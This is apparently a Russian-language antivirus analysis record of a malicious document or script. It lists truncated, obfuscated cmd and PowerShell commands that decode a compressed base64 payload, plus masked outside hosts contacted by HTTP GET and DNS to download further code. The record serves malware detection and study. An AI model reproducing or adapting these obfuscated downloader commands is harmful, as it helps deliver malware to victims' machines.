Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' cmD /c "Set vPn=(NeW-OBjeCT io.cOmPREsSIon.DEflaTeSTream( [sySTeM.iO.MEmoRystREaM] [sYSTeM.cOnvErt]::frOMbASE64sTRing( 'PZBBb8IwDIX/Sg+RAmIkO8DEiCohwZAKE5tY2TjskgaXZjRJlaaEDfHfl6Kxm/X8+dl+S...
Сетевая активность
Подключается к
- 'ba####reativa.com':80
- 'ch####efox.com.br':80
- 'bs###sage.hu':80
TCP
Запросы HTTP GET
- http://ba####reativa.com/wxhm4K4
- http://ch####efox.com.br/wCcfLmN5Iu
- http://bs###sage.hu/wXEUi4mRT
UDP
- DNS ASK am####rprise.info
- DNS ASK ba####reativa.com
- DNS ASK si######cultureproduce.com
- DNS ASK ch####efox.com.br
- DNS ASK bs###sage.hu
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' cmD /c "Set vPn=(NeW-OBjeCT io.cOmPREsSIon.DEflaTeSTream( [sySTeM.iO.MEmoRystREaM] [sYSTeM.cOnvErt]::frOMbASE64sTRing( 'PZBBb8IwDIX/Sg+RAmIkO8DEiCohwZAKE5tY2TjskgaXZjRJlaaEDfHfl6Kxm/X8+dl+S...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' ${9`QP} = [tyPE]( \"{3}{2}{1}{0}\" -F'eNt','NM','viro','En') ; ${eXeCUTiONcontexT}.\"I`NVo`kEcOMmanD\".(\"{0}{2}{1}\" -f 'invOkESC','PT','Ri' ).Invoke( ( ${9`qp}::( \"{4}{1}{3}{2}{5}{0}\...
